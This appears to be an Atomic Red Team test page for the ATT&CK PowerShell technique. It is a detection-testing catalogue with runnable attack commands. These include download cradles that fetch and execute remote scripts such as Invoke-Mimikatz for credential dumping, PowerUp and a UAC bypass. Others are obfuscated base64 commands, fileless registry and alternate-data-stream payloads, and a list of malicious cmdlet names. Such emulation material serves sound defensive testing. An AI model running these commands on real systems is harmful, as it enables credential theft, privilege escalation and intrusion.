T1059.001 - Command and Scripting Interpreter: PowerShell

Description from ATT&CK

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

Atomic Tests


Atomic Test #1 - Mimikatz

Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.

Supported Platforms: Windows

auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|

Attack Commands: Run with 
1

command_prompt
! Elevation Required (e.g. root or admin)

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"



Atomic Test #2 - Run BloodHound from local disk

Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.

Successful execution will produce stdout message stating “SharpHound Enumeration Completed”. Upon completion, final output will be a *BloodHound.zip file.

Supported Platforms: Windows

auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350

Attack Commands: Run with 
1

powershell
!

1
2
3
4

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

Cleanup Commands:

1

Remove-Item $env:Temp\*BloodHound.zip -Force

Dependencies: Run with 
1

powershell
!

Description: SharpHound.ps1 must be located at “PathToAtomicsFolder..\ExternalPayloads\SharpHound.ps1”
Check Prereq Commands:
1

if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
Get Prereq Commands:
1
2

New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"



Atomic Test #3 - Run Bloodhound from Memory using Download Cradle

Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.

Successful execution will produce stdout message stating “SharpHound Enumeration Completed”. Upon completion, final output will be a *BloodHound.zip file.

Supported Platforms: Windows

auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7

Attack Commands: Run with 
1

powershell
!

1
2
3
4

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

Cleanup Commands:

1

Remove-Item $env:Temp\*BloodHound.zip -Force



Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys

Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.

Supported Platforms: Windows

auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d

Attack Commands: Run with 
1

powershell
! Elevation Required (e.g. root or admin)

1

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr



Atomic Test #5 - Invoke-AppPathBypass

Note: Windows 10 only. Upon execution windows backup and restore window will be opened.

Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

Supported Platforms: Windows

auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372

Attack Commands: Run with 
1

command_prompt
!

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"



Atomic Test #6 - Powershell MsXml COM object - with prompt

Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, “Download Cradle test success!” will be displayed.

Provided by https://github.com/mgreen27/mgreen27.github.io

Supported Platforms: Windows

auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1|

Attack Commands: Run with 
1

command_prompt
!

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"



Atomic Test #7 - Powershell XML requests

Powershell xml download request. Upon execution, “Download Cradle test success!” will be dispalyed.

Provided by https://github.com/mgreen27/mgreen27.github.io

Supported Platforms: Windows

auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml|

Attack Commands: Run with 
1

command_prompt
!

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"



Atomic Test #8 - Powershell invoke mshta.exe download

Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display “Download Cradle test success!”.

Provided by https://github.com/mgreen27/mgreen27.github.io

Supported Platforms: Windows

auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct|

Attack Commands: Run with 
1

command_prompt
!

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"



Atomic Test #9 - Powershell Invoke-DownloadCradle

Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.

Supported Platforms: Windows

auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7

Run it with these steps!

  1. Open Powershell_ise as a Privileged Account
  2. Invoke-DownloadCradle.ps1



Atomic Test #10 - PowerShell Fileless Script Execution

Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open “C:\Windows\Temp” and verify that art-marker.txt is in the folder.

Supported Platforms: Windows

auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73

Attack Commands: Run with 
1

powershell
!

1
2
3

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

Cleanup Commands:

1
2

Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore



Atomic Test #11 - NTFS Alternate Data Stream Access

Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, “Stream Data Executed” will be displayed.

Supported Platforms: Windows

auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | ads_file | File created to store Alternate Stream Data | string | $env:TEMP\NTFS_ADS.txt|

Attack Commands: Run with 
1

powershell
!

1
2
3

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

Cleanup Commands:

1

Remove-Item #{ads_file} -Force -ErrorAction Ignore

Dependencies: Run with 
1

powershell
!

Description: Homedrive must be an NTFS drive
Check Prereq Commands:
1

if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
Get Prereq Commands:
1

Write-Host Prereq's for this test cannot be met automatically



Atomic Test #12 - PowerShell Session Creation and Use

Connect to a remote powershell session and interact with the host. Upon execution, network test info and ‘T1086 PowerShell Session Creation and Use’ will be displayed.

Supported Platforms: Windows

auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | hostname_to_connect | The host to connect to, by default it will connect to the local machine | string | $env:COMPUTERNAME|

Attack Commands: Run with 
1

powershell
! Elevation Required (e.g. root or admin)

1
2
3
4
5

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

Dependencies: Run with 
1

powershell
!

Description: PSRemoting must be enabled
Check Prereq Commands:
1
2
3
4
5
6
7

Try {
    New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null
    exit 0
} 
Catch {
    exit 1
}
Get Prereq Commands:
1

Enable-PSRemoting



Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations

Executes powershell.exe with variations of the -Command parameter

Supported Platforms: Windows

auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | command_line_switch_type | The type of supported command-line switch to use | string | Hyphen| | command_param_variation | The “Command” parameter variation to use | string | C|

Attack Commands: Run with 
1

powershell
!

1

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

Dependencies: Run with 
1

powershell
!

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
Check Prereq Commands:
1
2
3

$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1

Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied

Supported Platforms: Windows

auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | command_line_switch_type | The type of supported command-line switch to use | string | Hyphen| | command_param_variation | The “Command” parameter variation to use | string | C| | encoded_arguments_param_variation | The “EncodedArguments” parameter variation to use | string | EA|

Attack Commands: Run with 
1

powershell
!

1

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

Dependencies: Run with 
1

powershell
!

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
Check Prereq Commands:
1
2
3

$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1

Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Executes powershell.exe with variations of the -EncodedCommand parameter

Supported Platforms: Windows

auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | command_line_switch_type | The type of supported command-line switch to use | string | Hyphen| | encoded_command_param_variation | The “EncodedCommand” parameter variation to use | string | E|

Attack Commands: Run with 
1

powershell
!

1

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

Dependencies: Run with 
1

powershell
!

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
Check Prereq Commands:
1
2
3

$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1

Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied

Supported Platforms: Windows

auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | encoded_command_param_variation | The “EncodedCommand” parameter variation to use | string | E| | command_line_switch_type | The type of supported command-line switch to use | string | Hyphen| | encoded_arguments_param_variation | The “EncodedArguments” parameter variation to use | string | EncodedArguments|

Attack Commands: Run with 
1

powershell
!

1

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

Dependencies: Run with 
1

powershell
!

Description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
Check Prereq Commands:
1
2
3

$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
Get Prereq Commands:
1

Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



Atomic Test #17 - PowerShell Command Execution

Use of obfuscated PowerShell to execute an arbitrary command; outputs “Hello, from PowerShell!”. Example is from the 2021 Threat Detection Report by Red Canary.

Supported Platforms: Windows

auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | obfuscated_code | Defaults to: Invoke-Expression with a “Write-Host” line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==|

Attack Commands: Run with 
1

command_prompt
!

powershell.exe -e  #{obfuscated_code}



Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets

Powershell execution of known Malicious PowerShell Cmdlets

Supported Platforms: Windows

auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | Malicious_cmdlets | Known Malicious Cmdlets | string | “Add-Persistence”, “Find-AVSignature”, “Get-GPPAutologon”, “Get-GPPPassword”, “Get-HttpStatus”, “Get-Keystrokes”, “Get-SecurityPackages”, “Get-TimedScreenshot”, “Get-VaultCredential”, “Get-VolumeShadowCopy”, “Install-SSP”, “Invoke-CredentialInjection”, “Invoke-DllInjection”, “Invoke-Mimikatz”, “Invoke-NinjaCopy”, “Invoke-Portscan”, “Invoke-ReflectivePEInjection”, “Invoke-ReverseDnsLookup”, “Invoke-Shellcode”, “Invoke-TokenManipulation”, “Invoke-WmiCommand”, “Mount-VolumeShadowCopy”, “New-ElevatedPersistenceOption”, “New-UserPersistenceOption”, “New-VolumeShadowCopy”, “Out-CompressedDll”, “Out-EncodedCommand”, “Out-EncryptedScript”, “Out-Minidump”, “PowerUp”, “PowerView”, “Remove-Comments”, “Remove-VolumeShadowCopy”, “Set-CriticalProcess”, “Set-MasterBootRecord”|

Attack Commands: Run with 
1

powershell
! Elevation Required (e.g. root or admin)

1
2
3
4
5

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}



Atomic Test #19 - PowerUp Invoke-AllChecks

Check for privilege escalation paths using PowerUp from PowerShellMafia

Supported Platforms: Windows

auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b

Attack Commands: Run with 
1

powershell
!

1
2
3

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks



Atomic Test #20 - Abuse Nslookup with DNS Records

Red teamer’s avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. reference

Supported Platforms: Windows

auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1

Attack Commands: Run with 
1

powershell
!

1
2
3
4

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]



Atomic Test #21 - SOAPHound - Dump BloodHound Data

Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound

Supported Platforms: Windows

auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | user | Username for authentication | string | $env:USERNAME| | password | Password for authentication | string | P@ssword1| | domain | Domain for authentication | string | $env:USERDOMAIN| | dc | Domain Controller IP | string | 10.0.1.14| | cachefilename | Cache filename | string | c:\temp\cache.txt| | outputdirectory | Output directory | string | c:\temp\test2| | soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe|

Attack Commands: Run with 
1

powershell
!

1

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}



Atomic Test #22 - SOAPHound - Build Cache

Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound

Supported Platforms: Windows

auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | user | Username for authentication | string | $env:USERNAME| | password | Password for authentication | string | P@ssword1| | domain | Domain for authentication | string | $env:USERDOMAIN| | dc | Domain Controller IP | string | 10.0.1.14| | cachefilename | Cache filename | string | c:\temp\cache.txt| | soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe|

Attack Commands: Run with 
1

powershell
!

1

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}